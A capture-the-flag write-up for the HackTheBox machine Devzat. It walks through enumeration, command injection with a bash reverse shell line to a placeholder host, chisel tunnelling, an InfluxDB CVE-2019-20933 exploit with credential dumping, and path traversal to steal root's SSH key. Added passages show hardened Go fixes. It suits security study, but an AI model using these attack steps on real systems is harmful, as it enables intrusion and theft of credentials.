Devzat is one of the machines currently available on the HackTheBox hacking platform, rated Medium difficulty.
In this case it is a machine based on the Linux operating system.
Port scanning
As usual, we add the IP of the Devzat machine, 10.10.11.118, to /etc/hosts as devzat.htb and start with an nmap port scan.
```
# Nmap 7.92 scan initiated Wed Jan 12 08:02:12 2022 as: nmap -sV -sC -oA enumeration/nmap 10.10.11.118
Nmap scan report for 10.10.11.118
Host is up (0.047s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Go
| ssh-hostkey: 
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=1/12%Time=61DE7CFD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 08:02:53 2022 -- 1 IP address (1 host up) scanned in 41.71 seconds
```
Looking at the open ports, two are interesting: port 80, which serves a website, and port 8000, which runs a Go application over SSH.
Enumeration
We start the enumeration by reviewing the web portal at the URL devzat.htb.
Going through the site we find something interesting near the bottom, where it explains how to connect to a chat over SSH on port 8000, the one seen earlier.
So let's connect to it.
```
$ ssh -l devbot devzat.htb -p 8000
Nickname already in use, please choose a different one. > devzat
Less than a minute earlier
devbot: You seem to be new here hi. Welcome to Devzat! Run /help to see what you can do.
devbot: hi has joined the chat
hi: how are u
devbot: hi has left the chat
devbot: hi stayed on for 2 minutes
Welcome to the chat. There are no more users
devbot: devzat has joined the chat
devzat:
```
Let's look at the chat's help.
```
devzat: /help
[SYSTEM] Welcome to Devzat! Devzat is chat over SSH: github.com/quackduck/devzat
[SYSTEM] Because there's SSH apps on all platforms, even on mobile, you can join from anywhere.
[SYSTEM] 
[SYSTEM] Interesting features:
[SYSTEM] • Many, many commands. Run /commands.
[SYSTEM] • Rooms! Run /room to see all rooms and use /room #foo to join a new room.
[SYSTEM] • Markdown support! Tables, headers, italics and everything. Just use in place of newlines.
[SYSTEM] • Code syntax highlighting. Use Markdown fences to send code. Run /example-code to see an example.
[SYSTEM] • Direct messages! Send a quick DM using =user <msg> or stay in DMs by running /room @user.
[SYSTEM] • Timezone support, use /tz Continent/City to set your timezone.
[SYSTEM] • Built in Tic Tac Toe and Hangman! Run /tic or /hang <word> to start new games.
[SYSTEM] • Emoji replacements! (like on Slack and Discord)
[SYSTEM] 
[SYSTEM] For replacing newlines, I often use bulkseotools.com/add-remove-line-breaks.php.
[SYSTEM] 
[SYSTEM] Made by Ishan Goel with feature ideas from friends.
[SYSTEM] Thanks to Caleb Denio for lending his server!
[SYSTEM] 
[SYSTEM] For a list of commands run
```
And the commands it offers.
```
devzat: /commands
[SYSTEM] Commands
[SYSTEM] clear - Clears your terminal
[SYSTEM] message - Sends a private message to someone
[SYSTEM] users - Gets a list of the active users
[SYSTEM] all - Gets a list of all users who has ever connected
[SYSTEM] exit - Kicks you out of the chat incase your client was bugged
[SYSTEM] bell - Toggles notifications when you get pinged
[SYSTEM] room - Changes which room you are currently in
[SYSTEM] id - Gets the hashed IP of the user
[SYSTEM] commands - Get a list of commands
[SYSTEM] nick - Change your display name
[SYSTEM] color - Change your display name color
[SYSTEM] timezone - Change how you view time
[SYSTEM] emojis - Get a list of emojis you can use
[SYSTEM] help - Get generic info about the server
[SYSTEM] tictactoe - Play tictactoe
[SYSTEM] hangman - Play hangman
[SYSTEM] shrug - Drops a shrug emoji
[SYSTEM] ascii-art - Bob ross with text
[SYSTEM] example-code - Hello world!
devzat:
```
After spending a while on the chat and its options, it seems there is not much more we can do for now, so we run a series of enumerations and find an interesting domain while enumerating virtual hosts.
```
$ ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://devzat.htb
 :: Wordlist         : FUZZ: /home/asdf/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.devzat.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

pets                    [Status: 200, Size: 510, Words: 20, Lines: 21]
:: Progress: [4997/4997] :: Job [1/1] :: 855 req/sec :: Duration: [0:00:09] :: Errors: 0 ::
```
We discover the URL pets.devzat.htb, which hosts a pet inventory.
There doesn't seem to be much more here, so we enumerate directories with gobuster and find one in particular that will be useful.
```
$ gobuster dir -u http://pets.devzat.htb/ -w ~/github/SecLists/Discovery/Web-Content/raft-small-words.txt -t 150 -b 200,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://pets.devzat.htb/
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /home/asdf/github/SecLists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   200,404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/12 08:21:24 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 40] [--> /css/]
/build                (Status: 301) [Size: 42] [--> /build/]
/server-status        (Status: 403) [Size: 280]
/.git                 (Status: 301) [Size: 41] [--> /.git/]
===============================================================
2022/01/12 08:21:45 Finished
===============================================================
```
We see there is an exposed .git directory, so we use the git-dumper tool to download its contents.
```
$ ~/github/git-dumper/git-dumper.py http://pets.devzat.htb/.git pets-git
[-] Testing http://pets.devzat.htb/.git/HEAD [200]
[-] Testing http://pets.devzat.htb/.git/ [200]
[-] Fetching common files
[-] Fetching http://pets.devzat.htb/.gitignore [200]
[-] Fetching http://pets.devzat.htb/.git/description [200]
[-] Fetching http://pets.devzat.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://pets.devzat.htb/.git/COMMIT_EDITMSG [200]
[...]
[-] Fetching http://pets.devzat.htb/.git/index [200]
[-] Fetching http://pets.devzat.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://pets.devzat.htb/.git/FETCH_HEAD [404]
[-] Fetching http://pets.devzat.htb/.git/HEAD [200]
[-] Fetching http://pets.devzat.htb/.git/ORIG_HEAD [404]
[-] Fetching http://pets.devzat.htb/.git/config [200]
[-] Fetching http://pets.devzat.htb/.git/logs/HEAD [200]
[-] Fetching http://pets.devzat.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://pets.devzat.htb/.git/refs/heads/master [200]
[...]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://pets.devzat.htb/.git/objects/53/5028803d222b0e4e9174f56529c0ed9fece4e0 [200]
[-] Fetching http://pets.devzat.htb/.git/objects/7e/58517e9052d2ce28d12c549dc6ad30423e4c15 [200]
[...]
[-] Fetching http://pets.devzat.htb/.git/objects/28/a51e070175ab78da05529ff059367df9df3e57 [200]
[-] Running git checkout .
```
Reviewing the recovered code, we see that when the application loads the species it runs a shell command with the value without any validation or sanitisation, so this could be an entry point.
```go
func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	}
	return string(stdoutStderr)
}
```
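As an added example (not the pets application's own code), here is a hardened counterpart to the function above: it never invokes a shell, allowlists the species name before touching the filesystem, and does not echo raw errors back to the client. The names `validSpecies` and `loadCharacterSafe` are assumptions.

```go
// Hardened replacement for loadCharacter (example code, not from the pets app).
// The original passes "cat characteristics/" + species to "sh -c", so any shell
// metacharacter in species (";", "$(...)", "|") becomes a command run as the
// web user. The version below keeps the same behaviour for valid names and
// rejects everything else before doing any I/O.
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
)

// speciesRe allowlists short lowercase alphanumeric names such as "cat" or
// "dog". Slashes, dots, whitespace and shell metacharacters cannot match.
var speciesRe = regexp.MustCompile(`^[a-z0-9]{1,32}$`)

// ErrBadSpecies is returned for any species name that fails the allowlist.
var ErrBadSpecies = errors.New("invalid species name")

// validSpecies reports whether species passes the allowlist.
func validSpecies(species string) bool {
	return speciesRe.MatchString(species)
}

// loadCharacterSafe reads <dir>/characteristics/<species> directly with the
// os package; no shell is involved, so the input is data, never a command.
// Errors are reported generically instead of leaking paths to the caller.
func loadCharacterSafe(dir, species string) (string, error) {
	if !validSpecies(species) {
		return "", ErrBadSpecies
	}
	data, err := os.ReadFile(filepath.Join(dir, "characteristics", species))
	if err != nil {
		return "", fmt.Errorf("characteristics for %q unavailable", species)
	}
	return string(data), nil
}

func main() {
	// Constructed inputs: one benign name and one carrying a shell payload.
	for _, s := range []string{"cat", "cat; id"} {
		_, err := loadCharacterSafe(".", s)
		fmt.Printf("%-10q valid=%-5v err=%v\n", s, validSpecies(s), err)
	}
}
```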
With that in mind, we intercept the pet-creation request with Burp Suite and replace the value of the species field with our reverse shell, which is the following:
```
bash -i >& /dev/tcp/IP/PORT 0>&1
```
We base64-encode it and send it through Burp.
And we get a shell as the patrick user on our listener.
```
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from devzat.htb [10.10.11.118] 38912
bash: cannot set terminal process group (822): Inappropriate ioctl for device
bash: no job control in this shell
patrick@devzat:~/pets$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)
patrick@devzat:~/pets$
```
We're in, but this user cannot read the flag, so we enumerate the system in detail and find a very interesting process.
```
patrick@devzat:~$ ps aux|grep docker| grep -v grep|grep proxy
root        1253  0.0  0.1 549312  3888 ?        Sl   07:02   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8086 -container-ip 172.17.0.2 -container-port 8086
```
There is a container on the machine, and port 8086 on localhost is forwarded into it, so let's see what is listening there.
To do that we need a tunnel between our machine and the victim, and we'll use chisel for it.
First, we bring up the server on our side.
```
$ chisel server -p 8000 --reverse
2022/01/12 09:13:42 server: Reverse tunnelling enabled
2022/01/12 09:13:42 server: Fingerprint 73p8CtOWHKemanx5sjWhIx6yTBWl5lYJ3GU3cYHi03Y=
2022/01/12 09:13:42 server: Listening on http://0.0.0.0:8000
```
Then we start the client, which connects back to our server.
```
patrick@devzat:/tmp$ ./chisel_1.7.6_linux_amd64 client 10.10.14.2:8000 R:8086
2022/01/12 08:40:20 client: Connecting to ws://10.10.14.2:8000
2022/01/12 08:40:21 client: Connected (Latency 60.55383ms)
```
And on our listener we see port 8086 of the devzat machine forwarded to local port 8086.
```
$ chisel server -p 8000 --reverse
2022/01/12 09:32:28 server: Reverse tunnelling enabled
2022/01/12 09:32:28 server: Fingerprint UkgTUpewy1KFU02O0qg/aR5rd/kBTX14sI3Fgk/RFtY=
2022/01/12 09:32:28 server: Listening on http://0.0.0.0:8000
2022/01/12 09:32:28 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src)
2022/01/12 09:35:07 server: session#2: tun: proxy#R:8086=>8086: Listening
```
So let's use nmap to find out what is on that port.
```
# Nmap 7.92 scan initiated Wed Jan 12 09:36:31 2022 as: nmap -p 8086 -sV -oA enumeration/nmap_2 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00014s latency).

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 09:36:38 2022 -- 1 IP address (1 host up) scanned in 7.19 seconds
```
We discover that it is an InfluxDB instance, and we also know its version, 1.7.5, so a Google search turns up the vulnerability CVE-2019-20933 and a public exploit for it.
So we run it.
```
$ python3 __main__.py

[InfluxDB Exploit ASCII banner]

CVE-2019-20933

Insert ip host (default localhost): 
Insert port (default 8086): 
Insert influxdb user (wordlist path to bruteforce username): /home/asdf/github/SecLists/Usernames/Names/names.txt

Start username bruteforce
[x] aaliyah
[x] aaren
[x] aarika
[x] aaron
[...]
[x] adina
[x] aditya
[v] admin

Host vulnerable !!!

Databases list:

1) devzat
2) _internal

Insert database name (exit to close): 
```
Bingo! Let's check which tables exist in the devzat schema.
```
[devzat] Insert query (exit to change db): show measurements
{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "name"
                    ],
                    "name": "measurements",
                    "values": [
                        [
                            "user"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}
```
And let's pull the data out of the user table.
```
[devzat] Insert query (exit to change db): select * from "user"
{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "time",
                        "enabled",
                        "password",
                        "username"
                    ],
                    "name": "user",
                    "values": [
                        [
                            "2021-06-22T20:04:16.313965493Z",
                            false,
                            "WillyWonka2021",
                            "wilhelm"
                        ],
                        [
                            "2021-06-22T20:04:16.320782034Z",
                            true,
                            "woBeeYareedahc7Oogeephies7Aiseci",
                            "catherine"
                        ],
                        [
                            "2021-06-22T20:04:16.996682002Z",
                            true,
                            "RoyalQueenBee$",
                            "charles"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}
```
And we have a password.
Getting the user flag
We use the password we obtained to switch user and grab the first flag.
```
patrick@devzat:~$ su - catherine
Password: 
catherine@devzat:~$ ls -l
total 4
-r-------- 1 catherine catherine 33 Jan 12 07:02 user.txt
catherine@devzat:~$ cat user.txt
4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf
```
Privilege escalation
At this point we enumerate the machine again to see what we find now, and we come across two very juicy backups.
```
catherine@devzat:/var/backups$ ll
total 140
drwxr-xr-x  2 root      root       4096 Sep 29 16:25 ./
drwxr-xr-x 14 root      root       4096 Jun 22  2021 ../
-rw-r--r--  1 root      root      59142 Sep 28 18:45 apt.extended_states.0
-rw-r--r--  1 root      root       6588 Sep 21 20:17 apt.extended_states.1.gz
-rw-r--r--  1 root      root       6602 Jul 16 06:41 apt.extended_states.2.gz
-rw-------  1 catherine catherine 28297 Jul 16 07:00 devzat-dev.zip
-rw-------  1 catherine catherine 27567 Jul 16 07:00 devzat-main.zip
```
One corresponds to the development environment and the other to the main environment we connected to earlier, so we download both and diff the two; after a while searching, the interesting differences are in the file commands.go.
$ diff main/commands.go dev/commands.go 3a4 > "bufio" 4a6,7 > "os" > "path/filepath" 36a40 > file = commandInfo{"file", "Paste a files content directly to chat [alpha]", fileCommand, 1, false, nil} 38c42,101 < commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode} --- > commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file} > } > > func fileCommand(u *user, args []string) { > if len(args) < 1 { > u.system("Please provide file to print and the password") > return > } > > if len(args) < 2 { > u.system("You need to provide the correct password to use this function") > return > } > > path := args[0] > pass := args[1] > > // Check my secure password > if pass != "CeilingCatStillAThingIn2021?" { > u.system("You did provide the wrong password") > return > } > > // Get CWD > cwd, err := os.Getwd() > if err != nil { > u.system(err.Error()) > } > > // Construct path to print > printPath := filepath.Join(cwd, path) > > // Check if file exists > if _, err := os.Stat(printPath); err == nil { > // exists, print > file, err := os.Open(printPath) > if err != nil { > u.system(fmt.Sprintf("Something went wrong opening the file: %+v", err.Error())) > return > } > defer file.Close() > > scanner := bufio.NewScanner(file) > for scanner.Scan() { > u.system(scanner.Text()) > } > > if err := scanner.Err(); err != nil { > u.system(fmt.Sprintf("Something went wrong printing the file: %+v", err.Error())) > } > > return > > } else if os.IsNotExist(err) { > // does not exist, print error > u.system(fmt.Sprintf("The requested file @ %+v does not exist!", printPath)) > return > } > // bokred? > u.system("Something went badly wrong.") |
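Review bot: in the 38c42,101 hunk, `printPath := filepath.Join(cwd, path)` cleans the path but never checks that the result still lies below cwd, so an argument such as `../something` reads files outside the server directory; after the Join, verify with `filepath.Rel(cwd, printPath)` that the result does not begin with `..`, or better, serve only from a fixed directory of shareable files. In the same hunk the `os.Getwd()` error is reported but execution continues with an empty cwd, the password is a hard-coded literal compared with `!=` (a per-deployment secret from configuration compared with `subtle.ConstantTimeCompare` is the usual fix), and the `os.Stat` branch for errors other than not-exist falls through to "Something went badly wrong." without returning. The `// bokred?` comment also looks like a typo for "borked".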
And we see a difference between the two environments: dev has a command that never made it into main.
< commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode} --- > commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file} |
The dev environment also listens on a different port.
```
$ cat devchat.go |grep "port ="
	port = 8443
```
So let's connect to it and try the command.
```
catherine@devzat:/var/backups$ ssh -l test localhost -p 8443
The authenticity of host '[localhost]:8443 ([127.0.0.1]:8443)' can't be established.
ED25519 key fingerprint is SHA256:liAkhV56PrAa5ORjJC5MU4YSl8kfNXp+QuljetKw0XU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:8443' (ED25519) to the list of known hosts.
Welcome to the chat. There are no more users
devbot: test has joined the chat
test: /file
[SYSTEM] Please provide file to print and the password
```
It looks like we can read any file on the server, so let's try to retrieve the root user's SSH key.
```
test: /file ../.ssh/id_rsa CeilingCatStillAThingIn2021?
[SYSTEM] -----BEGIN OPENSSH PRIVATE KEY-----
[SYSTEM] b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
[SYSTEM] ......
[SYSTEM] ......
[SYSTEM] ......
[SYSTEM] .....
[SYSTEM] -----END OPENSSH PRIVATE KEY-----
test:
```
Bingo! We have it, although obviously we're not going to paste it here either.
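The traversal above works because `filepath.Join(cwd, path)` only normalises the path; it does not confine it. As an added example (not Devzat project code), `resolveUnder` below is the missing check: it joins the user-supplied name onto a base directory and rejects any result that escapes it. The function name and the `/srv/devzat` base are assumptions.

```go
// Path confinement check for a "print a file" style command (example code,
// not from Devzat). filepath.Join cleans ".." segments but happily returns a
// path above the base, which is exactly how ../.ssh/id_rsa escaped the chat
// directory. resolveUnder refuses such results before any file is opened.
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned when the requested path would leave base.
var ErrOutsideBase = errors.New("path escapes base directory")

// resolveUnder returns base/userPath if, after cleaning, it is still inside
// base; otherwise it returns ErrOutsideBase. Absolute user paths are refused
// outright because the command is only meant to take relative file names.
// Caveat: if base itself contains symlinks pointing elsewhere, resolve them
// first with filepath.EvalSymlinks and confine against the resolved path.
func resolveUnder(base, userPath string) (string, error) {
	if filepath.IsAbs(userPath) {
		return "", ErrOutsideBase
	}
	base = filepath.Clean(base)
	full := filepath.Join(base, userPath) // Join cleans, but does not confine
	rel, err := filepath.Rel(base, full)
	if err != nil {
		return "", ErrOutsideBase
	}
	// Rel yields ".." or "../x" exactly when full sits above base.
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return full, nil
}

func main() {
	// Constructed requests against an assumed base directory.
	for _, p := range []string{"README.md", "docs/../notes.txt", "../.ssh/id_rsa"} {
		full, err := resolveUnder("/srv/devzat", p)
		fmt.Printf("%-16s -> %q err=%v\n", p, full, err)
	}
}
```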
Getting the root flag
Now that we have root's key, we use it to log in over SSH and read the flag.
```
$ ssh -i keys/root.pem root@devzat.htb
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 12 Jan 2022 09:10:41 AM UTC

  System load:              0.8
  Usage of /:               60.0% of 7.81GB
  Memory usage:             40%
  Swap usage:               0%
  Processes:                245
  Users logged in:          1
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0:    10.10.11.118

107 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Oct 11 14:28:01 2021
root@devzat:~# ls -l
total 12
drwxr-x--- 2 root root 4096 Jul 16 06:56 devzat
drwxr-xr-x 3 root root 4096 Jun 22  2021 go
-r-------- 1 root root   33 Jan 12 07:02 root.txt
root@devzat:~# cat root.txt
9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx6
root@devzat:~#
```
And with the root flag in hand, the machine is complete and the points are ours.
If you're a HackTheBox user and liked my writeup, please give me respect at the following link